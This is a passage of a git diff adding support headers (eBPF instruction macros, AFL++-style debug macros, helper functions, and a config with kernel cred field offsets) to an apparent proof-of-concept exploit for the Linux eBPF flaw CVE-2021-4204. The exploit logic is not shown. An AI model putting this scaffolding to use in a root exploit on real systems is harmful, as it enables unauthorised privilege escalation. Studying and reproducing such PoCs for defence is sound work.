(dst_reg 'op' imm32) goto pc + off16 */ + +#define BPF_JMP_IMM(OP, DST, IMM, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_JMP | BPF_OP(OP) | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = OFF, \ + .imm = IMM }) + +/* Like BPF_JMP_IMM, but with 32-bit wide operands for comparison. 
*/
+
+#define BPF_JMP32_IMM(OP, DST, IMM, OFF) \
+ ((struct bpf_insn) { \
+ .code = BPF_JMP32 | BPF_OP(OP) | BPF_K, \
+ .dst_reg = DST, \
+ .src_reg = 0, \
+ .off = OFF, \
+ .imm = IMM })
+
+/* Raw code statement block */
+
+#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \
+ ((struct bpf_insn) { \
+ .code = CODE, \
+ .dst_reg = DST, \
+ .src_reg = SRC, \
+ .off = OFF, \
+ .imm = IMM })
+
+/* Program exit */
+
+#define BPF_EXIT_INSN() \
+ ((struct bpf_insn) { \
+ .code = BPF_JMP | BPF_EXIT, \
+ .dst_reg = 0, \
+ .src_reg = 0, \
+ .off = 0, \
+ .imm = 0 })
+
+#endif /* _BPF_H_ */
\ No newline at end of file
diff --git a/data/KernelPocs/CVE-2021-4204/include/config.h b/data/KernelPocs/CVE-2021-4204/include/config.h
new file mode 100644
index 0000000..b9e3832
--- /dev/null
+++ b/data/KernelPocs/CVE-2021-4204/include/config.h
@@ -0,0 +1,18 @@
+#ifndef _CONFIG_H_
+#define _CONFIG_H_
+
+#define VERSION "1.00a"
+
+#define MAP_NUM 0x40
+#define PROC_NUM 0x100
+#define PAGE_SIZE 0x1000
+#define __ID__ "SCSLSCSL"
+
+#define OFFSET_uid_from_cred 0x04
+#define OFFSET_gid_from_cred 0x08
+#define OFFSET_euid_from_cred 0x14
+#define OFFSET_egid_from_cred 0x18
+
+int verbose __attribute__((weak)) = 1;
+
+#endif /* _CONFIG_H_ */
\ No newline at end of file
diff --git a/data/KernelPocs/CVE-2021-4204/include/debug.h b/data/KernelPocs/CVE-2021-4204/include/debug.h
new file mode 100644
index 0000000..f6c7ed3
--- /dev/null
+++ b/data/KernelPocs/CVE-2021-4204/include/debug.h
@@ -0,0 +1,301 @@
+/*
+   american fuzzy lop++ - debug / error handling macros
+   ----------------------------------------------------
+   Originally written by Michal Zalewski
+   Now maintained by Marc Heuse <mh@mh-sec.de>,
+                     Heiko Eißfeldt <heiko.eissfeldt@hexco.de>,
+                     Andrea Fioraldi <andreafioraldi@gmail.com>,
+                     Dominik Maier <mail@dm4.io>
+   Copyright 2016, 2017 Google Inc. All rights reserved.
+   Copyright 2019-2020 AFLplusplus Project. All rights reserved.
+   Licensed under the Apache License, Version 2.0 (the "License");
+   you may not use this file except in compliance with the License.
+   You may obtain a copy of the License at:
+     http://www.apache.org/licenses/LICENSE-2.0
+ */
+
+#ifndef _HAVE_DEBUG_H
+#define _HAVE_DEBUG_H
+
+#include <errno.h>
+#include <stdio.h>
+
+#include "helper.h"
+#include "config.h"
+
+/*******************
+ * Terminal colors *
+ *******************/
+
+#ifndef MESSAGES_TO_STDOUT
+  #define MESSAGES_TO_STDOUT
+#endif
+
+#ifdef USE_COLOR
+
+  #define cBLK "\x1b[0;30m"
+  #define cRED "\x1b[0;31m"
+  #define cGRN "\x1b[0;32m"
+  #define cBRN "\x1b[0;33m"
+  #define cBLU "\x1b[0;34m"
+  #define cMGN "\x1b[0;35m"
+  #define cCYA "\x1b[0;36m"
+  #define cLGR "\x1b[0;37m"
+  #define cGRA "\x1b[1;90m"
+  #define cLRD "\x1b[1;91m"
+  #define cLGN "\x1b[1;92m"
+  #define cYEL "\x1b[1;93m"
+  #define cLBL "\x1b[1;94m"
+  #define cPIN "\x1b[1;95m"
+  #define cLCY "\x1b[1;96m"
+  #define cBRI "\x1b[1;97m"
+  #define cRST "\x1b[0m"
+
+  #define bgBLK "\x1b[40m"
+  #define bgRED "\x1b[41m"
+  #define bgGRN "\x1b[42m"
+  #define bgBRN "\x1b[43m"
+  #define bgBLU "\x1b[44m"
+  #define bgMGN "\x1b[45m"
+  #define bgCYA "\x1b[46m"
+  #define bgLGR "\x1b[47m"
+  #define bgGRA "\x1b[100m"
+  #define bgLRD "\x1b[101m"
+  #define bgLGN "\x1b[102m"
+  #define bgYEL "\x1b[103m"
+  #define bgLBL "\x1b[104m"
+  #define bgPIN "\x1b[105m"
+  #define bgLCY "\x1b[106m"
+  #define bgBRI "\x1b[107m"
+
+#else
+
+  #define cBLK ""
+  #define cRED ""
+  #define cGRN ""
+  #define cBRN ""
+  #define cBLU ""
+  #define cMGN ""
+  #define cCYA ""
+  #define cLGR ""
+  #define cGRA ""
+  #define cLRD ""
+  #define cLGN ""
+  #define cYEL ""
+  #define cLBL ""
+  #define cPIN ""
+  #define cLCY ""
+  #define cBRI ""
+  #define cRST ""
+
+  #define bgBLK ""
+  #define bgRED ""
+  #define bgGRN ""
+  #define bgBRN ""
+  #define bgBLU ""
+  #define bgMGN ""
+  #define bgCYA ""
+  #define bgLGR ""
+  #define bgGRA ""
+  #define bgLRD ""
+  #define bgLGN ""
+  #define bgYEL ""
+  #define bgLBL ""
+  #define bgPIN ""
+  #define bgLCY ""
+  #define bgBRI ""
+
+#endif /* ^USE_COLOR */
+
+/*************************
+ * Box drawing sequences *
+ *************************/
+
+#ifdef FANCY_BOXES
+
+  #define SET_G1   "\x1b)0"  /* Set G1 for box drawing    */
+  #define RESET_G1 "\x1b)B"  /* Reset G1 to ASCII         */
+  #define bSTART   "\x0e"    /* Enter G1 drawing mode     */
+  #define bSTOP    "\x0f"    /* Leave G1 drawing mode     */
+  #define bH       "q"       /* Horizontal line           */
+  #define bV       "x"       /* Vertical line             */
+  #define bLT      "l"       /* Left top corner           */
+  #define bRT      "k"       /* Right top corner          */
+  #define bLB      "m"       /* Left bottom corner        */
+  #define bRB      "j"       /* Right bottom corner       */
+  #define bX       "n"       /* Cross                     */
+  #define bVR      "t"       /* Vertical, branch right    */
+  #define bVL      "u"       /* Vertical, branch left     */
+  #define bHT      "v"       /* Horizontal, branch top    */
+  #define bHB      "w"       /* Horizontal, branch bottom */
+
+#else
+
+  #define SET_G1   ""
+  #define RESET_G1 ""
+  #define bSTART   ""
+  #define bSTOP    ""
+  #define bH       "-"
+  #define bV       "|"
+  #define bLT      "+"
+  #define bRT      "+"
+  #define bLB      "+"
+  #define bRB      "+"
+  #define bX       "+"
+  #define bVR      "+"
+  #define bVL      "+"
+  #define bHT      "+"
+  #define bHB      "+"
+
+#endif /* ^FANCY_BOXES */
+
+/***********************
+ * Misc terminal codes *
+ ***********************/
+
+#define TERM_HOME "\x1b[H"
+#define TERM_CLEAR TERM_HOME "\x1b[2J"
+#define cEOL "\x1b[0K"
+#define CURSOR_HIDE "\x1b[?25l"
+#define CURSOR_SHOW "\x1b[?25h"
+
+/************************
+ * Debug & error macros *
+ ************************/
+
+/* Just print stuff to the appropriate stream. */
+
+#ifdef MESSAGES_TO_STDOUT
+  #define SAYF(x...) printf(x)
+#else
+  #define SAYF(x...)
fprintf(stderr, x) +#endif /* ^MESSAGES_TO_STDOUT */ + +/* Show a prefixed warning. */ + +#define WARNF(x...) \ + do { if (verbose) { \ + \ + SAYF(cYEL "[!] " cBRI "WARNING: " cRST x); \ + SAYF(cRST "\n"); \ + \ + } } while (0) + +/* Show a prefixed "doing something" message. */ + +#define ACTF(x...) \ + do { if (verbose) { \ + \ + SAYF(cLBL "[*] " cRST x); \ + SAYF(cRST "\n"); \ + \ + } } while (0) + +/* Show a prefixed "success" message. */ + +#define OKF(x...) \ + do { \ + \ + SAYF(cLGN "[+] " cRST x); \ + SAYF(cRST "\n"); \ + \ + } while (0) + +/* Show a prefixed fatal error message (not used in afl). */ + +#define BADF(x...) \ + do { \ + \ + SAYF(cLRD "[-] " cRST x); \ + SAYF(cRST "\n"); \ + \ + } while (0) + +/* Die with a verbose non-OS fatal error message. */ + +#define FATAL(x...) \ + do { \ + \ + SAYF(bSTOP RESET_G1 CURSOR_SHOW cRST cLRD \ + "\n[-] PROGRAM ABORT : " cRST x); \ + SAYF(cLRD "\n Location : " cRST "%s(), %s:%u\n\n", __func__, \ + __FILE__, __LINE__); \ + exit(1); \ + \ + } while (0) + +/* Die by calling abort() to provide a core dump. */ + +#define ABORT(x...) \ + do { \ + \ + SAYF(bSTOP RESET_G1 CURSOR_SHOW cRST cLRD \ + "\n[-] PROGRAM ABORT : " cRST x); \ + SAYF(cLRD "\n Stop location : " cRST "%s(), %s:%u\n\n", __func__, \ + __FILE__, __LINE__); \ + abort(); \ + \ + } while (0) + +/* Die while also including the output of perror(). */ + +#define PFATAL(x...) \ + do { \ + \ + fflush(stdout); \ + SAYF(bSTOP RESET_G1 CURSOR_SHOW cRST cLRD \ + "\n[-] SYSTEM ERROR : " cRST x); \ + SAYF(cLRD "\n Stop location : " cRST "%s(), %s:%u\n", __func__, \ + __FILE__, __LINE__); \ + SAYF(cLRD " OS message : " cRST "%s\n", strerror(errno)); \ + exit(1); \ + \ + } while (0) + +/* Die with FATAL() or PFATAL() depending on the value of res (used to + interpret different failure modes for read(), write(), etc). */ + +#define RPFATAL(res, x...) \ + do { \ + \ + if (res < 0) \ + PFATAL(x); \ + else \ + FATAL(x); \ + \ + } while (0) + +/* Show a prefixed debug output. */ + +#define DEBUGF(x...) \ + do { if(verbose > 1) { \ + \ + SAYF(cMGN "[D] " cBRI "DEBUG: " cRST x); \ + SAYF(cRST "\n"); \ + \ + } } while (0) + +/* Error-checking versions of read() and write() that call RPFATAL() as + appropriate. */ + +#define ck_write(fd, buf, len, fn) \ + do { \ + \ + int _fd = (fd); \ + \ + s32 _len = (s32)(len); \ + s32 _res = write(_fd, (buf), _len); \ + if (_res != _len) RPFATAL(_res, "Short write to %s, fd %d", fn, _fd); \ + \ + } while (0) + +#define ck_read(fd, buf, len, fn) \ + do { \ + \ + s32 _len = (s32)(len); \ + s32 _res = read(fd, buf, _len); \ + if (_res != _len) RPFATAL(_res, "Short read from %s", fn); \ + \ + } while (0) + +#endif /* ! 
_HAVE_DEBUG_H */
\ No newline at end of file
diff --git a/data/KernelPocs/CVE-2021-4204/include/helper.h b/data/KernelPocs/CVE-2021-4204/include/helper.h
new file mode 100644
index 0000000..7186dcb
--- /dev/null
+++ b/data/KernelPocs/CVE-2021-4204/include/helper.h
@@ -0,0 +1,90 @@
+#ifndef _HELPER_H_
+#define _HELPER_H_
+
+#include <stdio.h>
+#include <stdint.h>
+#include <stdbool.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+
+typedef int8_t s8;
+typedef int16_t s16;
+typedef int32_t s32;
+typedef int64_t s64;
+
+typedef uint8_t u8;
+typedef uint16_t u16;
+typedef uint32_t u32;
+typedef uint64_t u64;
+
+typedef void* kaddr_t;
+
+#define U8_MAX ((u8)~0U)
+#define S8_MAX ((s8)(U8_MAX >> 1))
+#define S8_MIN ((s8)(-S8_MAX - 1))
+#define U16_MAX ((u16)~0U)
+#define S16_MAX ((s16)(U16_MAX >> 1))
+#define S16_MIN ((s16)(-S16_MAX - 1))
+#define U32_MAX ((u32)~0U)
+#define S32_MAX ((s32)(U32_MAX >> 1))
+#define S32_MIN ((s32)(-S32_MAX - 1))
+#define U64_MAX ((u64)~0ULL)
+#define S64_MAX ((s64)(U64_MAX >> 1))
+#define S64_MIN ((s64)(-S64_MAX - 1))
+
+int urandom()
+{
+    int r;
+    int rand_fd = open("/dev/urandom", O_RDONLY);
+    if (rand_fd < 0) {
+        return -1;
+    }
+    read(rand_fd, &r, sizeof(r));
+    close(rand_fd);
+    return r;
+}
+
+void *memmem(const void *haystack, size_t haystack_len,
+             const void *needle, size_t needle_len)
+{
+    const char *begin = haystack;
+    const char *last_possible = begin + haystack_len - needle_len;
+    const char *tail = needle;
+    char point;
+
+    /*
+     * The first occurrence of the empty string is deemed to occur at
+     * the beginning of the string.
+     */
+    if (needle_len == 0)
+        return (void *)begin;
+
+    /*
+     * Sanity check, otherwise the loop might search through the whole
+     * memory.
+     */
+    if (haystack_len < needle_len)
+        return NULL;
+
+    point = *tail++;
+    for (; begin <= last_possible; begin++) {
+        if (*begin == point && !memcmp(begin + 1, tail, needle_len - 1))
+            return (void *)begin;
+    }
+
+    return NULL;
+}
+
+int memoff(const void *haystack, size_t haystack_len,
+           const void *needle, size_t needle_len)
+{
+    void *found = memmem(haystack, haystack_len, needle, needle_len);
+    if (found) {
+        return (int)(found - haystack);
+    }
+    return -1;
+}
+
+#endif /* _HELPER_H_ */
\ No newline at end of file